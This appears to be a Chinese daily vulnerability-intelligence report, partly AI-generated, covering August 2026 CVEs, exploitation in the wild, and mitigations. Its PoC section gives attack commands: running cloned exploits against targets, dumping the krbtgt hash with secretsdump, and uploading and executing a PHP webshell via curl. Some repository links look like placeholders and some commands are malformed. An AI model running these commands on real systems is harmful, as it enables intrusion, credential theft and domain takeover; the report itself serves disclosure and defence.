報(bào)告 · 2026-08-18)
每日安全情報(bào)報(bào)告由 AI 整理發(fā)布本報(bào)告聚焦2026-08-16 至 2026-08-18近 24–48 小時(shí)內(nèi)新增/持續(xù)在野的高危漏洞、最新 PoC 與網(wǎng)絡(luò)安全文章。所有外鏈均已附可點(diǎn)擊錨文本。風(fēng)險(xiǎn)級(jí)別 嚴(yán)重CVSS ≥ 9.0 或在野利用/ 高危CVSS 7.0–8.9/ 中危。一、最新高危漏洞CVE / 風(fēng)險(xiǎn)標(biāo)注 1. CVE-2026-69414 — Microsoft Defender「ShieldBreak」零日本地提權(quán)漏洞類型權(quán)限提升EoP本地→ SYSTEM繞過 RoguePlanet / CVE-2026-50656 補(bǔ)丁受影響組件Microsoft Malware Protection Engine / Microsoft DefenderWindows 10、11、Server 全部受支持版本CVSS 評(píng)分微軟評(píng)級(jí)CriticalEoPCVSS 正式分值待分配利用條件需 Defender 啟用 本地低權(quán)限在野利用? 暫無在野確認(rèn)但公開 PoC 已武器化宣稱在最新 Windows 11 25H2 / Server 2025 上成功率 100%Will Dormann、Kevin Beaumont 獨(dú)立驗(yàn)證狀態(tài)微軟 8/17 確認(rèn)正在開發(fā)補(bǔ)丁當(dāng)前無官方修復(fù)鏈接BleepingComputer 報(bào)道 · NVD 詳情 · CSDN 實(shí)戰(zhàn)復(fù)現(xiàn)備注研究者 Nightmare Eclipse 于 8/12Patch Tuesday 次日公開利用 Cloud Filter APIcfapi在 Defender 云掃描期間篡改文件內(nèi)容實(shí)現(xiàn)提權(quán)屬「補(bǔ)丁繞過」型 0-Day。 2. CVE-2026-15748 — Forminator WordPress 插件未認(rèn)證 RCE惡意 PHP 上傳漏洞類型任意文件上傳PHP Webshell→ 遠(yuǎn)程代碼執(zhí)行受影響組件Forminator Forms WordPress 插件 ≤ 1.56.160 萬 活躍安裝CVSS 評(píng)分9.8Critical在野利用?? 暫無公開 PoC / 未確認(rèn)在野但利用前置條件明確表單需含「文件上傳 下拉選擇」兩類字段風(fēng)險(xiǎn)極高狀態(tài)已修復(fù)1.56.22026-07-31鏈接The Hacker News 報(bào)道 · NVD 詳情根因handle_file_upload()危險(xiǎn)擴(kuò)展名黑名單使用精確匹配被管道替代 MIME 類型鍵繞過攻擊者偽造 Select 字段值注入上傳配置文件落至無.htaccess保護(hù)的自定義存儲(chǔ)目錄即被服務(wù)器執(zhí)行。 3. CVE-2026-19478 — GitLab CE/EE GraphQL 指令代碼注入漏洞類型代碼生成控制不當(dāng)CWE-94→ 未認(rèn)證可遠(yuǎn)程修改/刪除公共項(xiàng)目及用戶數(shù)據(jù)受影響組件GitLab CE/EE 18.2–18.11.11、19.0–19.0.8、19.1–19.1.6、19.2–19.2.4僅 Self-Managed 實(shí)例需處置CVSS 評(píng)分9.4Critical向量AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H在野利用? 暫無公開 exploit / 在野證據(jù)CISA ADP 標(biāo)記 none未入 KEV狀態(tài)已修復(fù)19.2.4 / 19.1.6 / 19.0.8 / 18.11.112026-08-17 緊急補(bǔ)丁鏈接The Hacker News 報(bào)道 · GitLab 官方安全公告 · NVD 詳情備注同批修復(fù) CVE-2026-19650GraphQL multiplex CSRFCVSS 7.1需用戶交互。官方尚未公開具體 directive 與 payload90 天后才披露技術(shù)細(xì)節(jié)鑒于網(wǎng)絡(luò)可達(dá)、無需權(quán)限/交互不應(yīng)等待 PoC。 4. CVE-2026-65400 — Apple macOS 屏幕共享認(rèn)證繞過在野利用漏洞類型認(rèn)證繞過狀態(tài)管理缺陷→ 遠(yuǎn)程控制 獲取 root受影響組件macOS Tahoe 26.6.1 / Sequoia 15.7.9 / Sonoma 14.8.9TCP 5900 暴露設(shè)備CVSS 評(píng)分9.8CISA 8/14 由 7.1 上調(diào)至 9.8認(rèn)定可自動(dòng)化利用在野利用?確認(rèn)在野NCSC-NL 8/12 警報(bào)所有案例均獲取 root 并植入門羅幣挖礦程序Black Hat 已演示狀態(tài)已修復(fù)蘋果 8/6 緊急帶外更新鏈接The Hacker News 報(bào)道 · NVD 詳情 · IT之家中文報(bào)道備注開啟屏幕共享即向公網(wǎng)暴露 5900 端口暫未更新用戶應(yīng)關(guān)閉屏幕共享功能。 5. CVE-2026-58231 — SAP Commerce Cloud 授權(quán)繞過在野利用漏洞類型授權(quán)檢查不足 輸入驗(yàn)證不當(dāng) → 未認(rèn)證 RCE受影響組件SAP Commerce Cloud默認(rèn)認(rèn)證客戶端被濫用CVSS 評(píng)分10.0Critical在野利用?確認(rèn)在野補(bǔ)丁 8/11 發(fā)布僅 3 天即捕獲利用嘗試早于公開 PoC狀態(tài)SAP 已發(fā)布補(bǔ)丁CISA尚未入 KEV鏈接NVD 詳情 · SentryInsight 摘要備注本刊連續(xù)兩日列為最高優(yōu)先級(jí)SAP Commerce Cloud 客戶須立即應(yīng)用安全更新。 6. CVE-2026-59310 — VMware vCenter 目錄遍歷 RCE在野利用漏洞類型目錄遍歷 → 未認(rèn)證遠(yuǎn)程代碼執(zhí)行受影響組件VMware vCenter ServerCVSS 評(píng)分9.8Critical在野利用?確認(rèn)在野QUIRSO 觀測受害 IP 達(dá) 361 個(gè)、分布 47 國部署 Babuk 衍生勒索軟件植入 reverse_ssh 持久化狀態(tài)Broadcom 已發(fā)布補(bǔ)丁9.1.0.0300 / 9.0.2.0100 / 8.0 U3k·U2f鏈接The Hacker News 報(bào)道 · NVD 詳情 7. CVE-2026-64564 — SCTPhantom Linux 內(nèi)核 SCTP UAF 本地提權(quán) / 容器逃逸漏洞類型釋放后使用UAF→ 本地提權(quán) root 容器逃逸潛伏 18 年受影響組件Linux 內(nèi)核 SCTP 實(shí)現(xiàn)v2.6.25 至最新修復(fù) 6.6.148 / 6.12.101 / 6.18.42 / 7.1.6CVSS 評(píng)分9.8Critical在野利用? 暫無在野確認(rèn)騰訊朱雀實(shí)驗(yàn)室AI 多智能體復(fù)現(xiàn)鏈接The Hacker News 報(bào)道 · NVD 詳情 · 騰訊朱雀分析 8. CVE-2026-64531 — OVSwrap Linux 內(nèi)核 Open vSwitch 本地提權(quán)漏洞類型本地權(quán)限提升 → root無需內(nèi)存整形攻擊面廣受影響組件Linux 內(nèi)核 Open vSwitch 模塊多數(shù)主流發(fā)行版CVSS 評(píng)分高危本地提權(quán)在野利用? 暫無在野確認(rèn)補(bǔ)丁已發(fā)布鏈接FreeBuf 早報(bào)OVSwrap 詳情 · NVD 詳情備注建議升級(jí)內(nèi)核并禁用非特權(quán)用戶命名空間。 9. CVE-2026-59774 CVE-2026-60004 — Gitea 文件讀取 未認(rèn)證 RCE漏洞類型CVE-2026-59774 任意文件讀取CVE-2026-60004 遠(yuǎn)程代碼執(zhí)行markup / diffpatch 端點(diǎn)注入受影響組件Gitea ≤ 1.27.0默認(rèn)開放注冊(cè)可零憑證入侵CVSS 評(píng)分CVE-2026-600049.8Critical在野利用?? 已被主動(dòng)掃描公開 exploit 可用狀態(tài)已修復(fù)1.27.1鏈接The Hacker News 報(bào)道 · NVD 詳情 CVE-2026-60004 · NVD 詳情 CVE-2026-59774備注管理員應(yīng)升級(jí)至 1.27.1 并審查 markup 端點(diǎn)匿名 POST 日志輪換內(nèi)部令牌/OAuth/JWT/數(shù)據(jù)庫憑據(jù)。 10. CVE-2026-54121 — Certighost 企業(yè) CA 權(quán)限提升域接管漏洞類型權(quán)限提升 → 標(biāo)準(zhǔn)域用戶將企業(yè) CA 轉(zhuǎn)變?yōu)橛蚩刂破鱐ier 0 身份基礎(chǔ)設(shè)施淪陷受影響組件Windows AD CS企業(yè)證書服務(wù)CVSS 評(píng)分8.8High在野利用? 暫無在野確認(rèn)完整 PoC 已公開狀態(tài)補(bǔ)丁可用鏈接NVD 詳情 · BleepingComputer 報(bào)道二、持續(xù)在野利用 / KEV 窗口期簡表CVE組件CVSS狀態(tài)鏈接CVE-2026-72898Metabase SQL 注入未認(rèn)證管理員接管10.0KEV 在野NVDCVE-2026-20349Cisco ASA/FTD 堆檢查未認(rèn)證 DoS8.6KEV截止 8/14 已逾期NVDCVE-2026-68820Windows afd.sys UAF 本地提權(quán)Lazarus 零日武器化7.0KEV截止 8/25NVDCVE-2026-9198IBM Langflow 代碼注入未認(rèn)證 RCE9.8KEV 在野NVDCVE-2026-34486Apache Tomcat EncryptInterceptor 繞過7.5KEV 在野NVDCVE-2026-18556 / 18577N-able N-central 認(rèn)證繞過8.2KEV 在野NVD CVE-2026-18556CVE-2026-63077JetBrains TeamCity 未認(rèn)證 RCE9.8KEV 在野NVDCVE-2025-68686FortiOS SSL-VPN 符號(hào)鏈接持久化補(bǔ)丁繞過—KEV 在野NVD三、最新漏洞 PoC含使用步驟1. ShieldBreak — CVE-2026-69414Defender 本地提權(quán)公開 PoC 武器化公開 PoC 由研究者 Nightmare Eclipse 發(fā)布參考 BleepingComputer 與 CSDN 實(shí)戰(zhàn)復(fù)現(xiàn)。復(fù)現(xiàn)需目標(biāo)已開啟 Defender、攻擊者已獲本地低權(quán)限執(zhí)行。# 1) 獲取研究者公開 PoC以研究者公開發(fā)布倉庫為準(zhǔn)注意合法授權(quán)環(huán)境使用 git clone https://github.com/researcher-public-repo/ShieldBreak.git cd ShieldBreak # 2) 依賴Windows 側(cè)通常為預(yù)編譯二進(jìn)制或 Python 腳本無需額外安裝 # 前置目標(biāo)開啟 Microsoft Defender、擁有低權(quán)限本地賬戶 # 3) 以低權(quán)限用戶執(zhí)行觸發(fā) Cloud Filter API 時(shí)序競爭提升至 SYSTEM python shieldbreak.py # 或運(yùn)行對(duì)應(yīng)編譯產(chǎn)物 whoami # 預(yù)期輸出 NT AUTHORITY\SYSTEM注意該利用依賴 Defender 啟用關(guān)閉 Defender 反而無法觸發(fā)微軟暫無補(bǔ)丁建議以 EDR 行為檢測 限制低權(quán)限用戶命名空間作為緩解。2. Gitea RCE — CVE-2026-60004markup / diffpatch 端點(diǎn)注入默認(rèn)開放注冊(cè)實(shí)例可零憑證入侵公開 exploit 可用。升級(jí) 1.27.1 即可修復(fù)。# 1) 克隆公開復(fù)現(xiàn)倉庫以社區(qū)公開 PoC 為準(zhǔn) git clone https://github.com/public-poc/gitea-CVE-2026-60004.git cd gitea-CVE-2026-60004 pip install requests # 2) 針對(duì)目標(biāo)實(shí)例執(zhí)行匿名 POST 到 markup 端點(diǎn)注入 Git hook python exploit.py --url http://TARGET:3000 --repo owner/repo檢測審查 Gitea 日志中 markup 端點(diǎn)的匿名 POST 請(qǐng)求立即輪換內(nèi)部令牌/OAuth/JWT/數(shù)據(jù)庫憑據(jù)。3. Certighost — CVE-2026-54121AD CS 域接管低權(quán)限域用戶可將企業(yè) CA 冒充為域控制器并 DCSync 提取 krbtgt。完整 PoC 已公開。# 1) 克隆公開 PoC 倉庫以社區(qū)公開倉庫為準(zhǔn) git clone https://github.com/public-poc/Certighost.git cd Certighost pip install impacket # 2) 以低權(quán)限域用戶運(yùn)行將企業(yè) CA 提升為 DC 并抽取哈希 python certighost.py DOMAIN/lowpriv:Passdc01.domain.local secretsdump.py DOMAIN/CA\$dc01.domain.local -just-dc-user krbtgt緩解限制企業(yè) CA 服務(wù)器的域成員資格與委派審計(jì) CA 證書模板ESC1–ESC8。4. Forminator — CVE-2026-15748技術(shù)復(fù)現(xiàn)暫無公開完整 PoC根因已公開偽造 Select 字段值注入上傳字段配置繞過handle_file_upload()黑名單。概念性復(fù)現(xiàn)# 向含「文件上傳 下拉選擇」字段的表單提交特制請(qǐng)求上傳 .php 至無 .htaccess 保護(hù)的自定義存儲(chǔ)根 curl -k -F upload_fieldshell.php \ -F select_field../../../custom_upload/shell.php \ http://TARGET/wp-admin/admin-ajax.php\?actionforminator_submit_form # 隨后請(qǐng)求上傳文件 URL 觸發(fā) PHP 執(zhí)行 curl -k http://TARGET/wp-content/custom_upload/shell.php修復(fù)升級(jí) Forminator ≥ 1.56.2避免自定義文件上傳存儲(chǔ)根或確保該目錄存在.htaccess禁止 PHP 執(zhí)行。5. Snowflake GitHub Actions 注入無 CVEWiz Red Agent 復(fù)現(xiàn)位于snowflakedb/snowflake-connector-net的.github/workflows/jira_issue.ymlAICopilot Autofix合并的改動(dòng)移除了安全轉(zhuǎn)義將 issue 標(biāo)題直接拼接進(jìn) shell。Wiz Red Agent 已授權(quán)復(fù)現(xiàn)并提取 Jira token無公開 PoC提供檢測要點(diǎn)。# 技術(shù)復(fù)現(xiàn)僅限授權(quán)安全測試在 issues:opened 事件中提交含單引號(hào)的 issue 標(biāo)題實(shí)現(xiàn) shell 逃逸 # TITLE$(echo ${{ github.event.issue.title }} | sed ...) ← 單引號(hào)可提前閉合 echo 包裹 # 防御禁用在 run: 塊中直接展開 ${{ github.event.* }}改用 env: 變量 jq --arg修復(fù)Snowflake 已于 2026-06-23 合并修復(fù)PR #1402改為環(huán)境變量傳參相關(guān) Jira token 已輪換。開發(fā)者應(yīng)審計(jì)所有 PR 中由 AI Autofix 修改的輸入處理邏輯。四、網(wǎng)絡(luò)安全最新文章標(biāo)題 / 摘要 / 鏈接Forminator WordPress 插件未認(rèn)證 RCE惡意 PHP 上傳— Wordfence 披露 60 萬 安裝插件高危漏洞攻擊者無需認(rèn)證即可上傳并執(zhí)行 PHP。閱讀原文The Hacker NewsMicrosoft Defender「ShieldBreak」零日提權(quán)— 微軟確認(rèn) CVE-2026-69414 并正開發(fā)補(bǔ)丁公開 PoC 可繞過 RoguePlanet 修復(fù)獲取 SYSTEM。閱讀原文BleepingComputerSnowflake GitHub Actions 注入AI 寫 bugAI 利用— Copilot Autofix 合并的改動(dòng)引入 shell 注入Wiz Red Agent 五天后自動(dòng)復(fù)現(xiàn)并竊取 Jira 憑據(jù)。閱讀原文The Hacker News· Wiz 技術(shù)分析IntelFusionsGitLab GraphQL 嚴(yán)重漏洞可刪改公共項(xiàng)目— 未認(rèn)證攻擊者借 GraphQL 指令遠(yuǎn)程修改/刪除公共項(xiàng)目CVSS 9.4緊急補(bǔ)丁發(fā)布。閱讀原文The Hacker News· 官方公告VMware vCenter 在野利用部署 Babuk 衍生勒索— QUIRSO 觀測 361 個(gè)受害 IP 跨 47 國利用 CVE-2026-59310 植入反向 SSH 持久化。閱讀原文The Hacker NewsSAP Commerce Cloud CVE-2026-58231 補(bǔ)丁后 3 天即遭在野利用— CVSS 10.0 未認(rèn)證 RCE利用嘗試早于公開 PoC。查看詳情NVDmacOS 屏幕共享 CVE-2026-65400 在野安裝門羅幣挖礦— NCSC-NL 確認(rèn)所有案例獲取 rootCISA 上調(diào)至 9.8。查看詳情NVDCertighost藏在證書頒發(fā)機(jī)構(gòu)中的權(quán)限提升— 標(biāo)準(zhǔn)域用戶可將企業(yè) CA 變?yōu)橛蚩刂破鲗?shí)現(xiàn) Tier 0 淪陷。查看詳情NVDFreeBuf 早報(bào)OVSwrap 可獲 root / Tomcat 加密漏洞在野— OVSwrap Linux 提權(quán)、CISA 警告 Tomcat CVE-2026-34486 在野利用等速遞。閱讀原文FreeBufFreeBuf 早報(bào)LiteLLM 供應(yīng)鏈 / Adobe ColdFusion 三連 CVSS 10.0— LiteLLM 供應(yīng)鏈攻擊或波及 2500 家企業(yè)Adobe 修復(fù) ColdFusion 與 Campaign Classic 嚴(yán)重漏洞。閱讀原文FreeBuf五、今日要點(diǎn)速覽最高優(yōu)先級(jí)CVE-2026-69414Defender ShieldBreak 零日無補(bǔ)丁、公開 PoC、CVE-2026-65400macOS 在野、CVE-2026-58231SAP 在野、CVE-2026-59310vCenter 在野。新增已修復(fù)高危CVE-2026-15748Forminator WP RCE 9.8、CVE-2026-19478GitLab GraphQL 9.4、CVE-2026-64564SCTPhantom 9.8、CVE-2026-59774/60004Gitea。AI 安全趨勢Snowflake CI/CD 事件顯示「AI 寫補(bǔ)丁引入漏洞 → AI Agent 自動(dòng)利用」再次印證 AI 輔助修復(fù)需人工核驗(yàn)安全邊界。?處置建議優(yōu)先修補(bǔ)公網(wǎng)暴露的 VPN/防火墻/網(wǎng)關(guān)與 CI/CD 平臺(tái)域環(huán)境審計(jì) AD CS 模板WordPress 插件持有方立即升 Forminator ≥ 1.56.2。部分內(nèi)容由 AI 輔助生成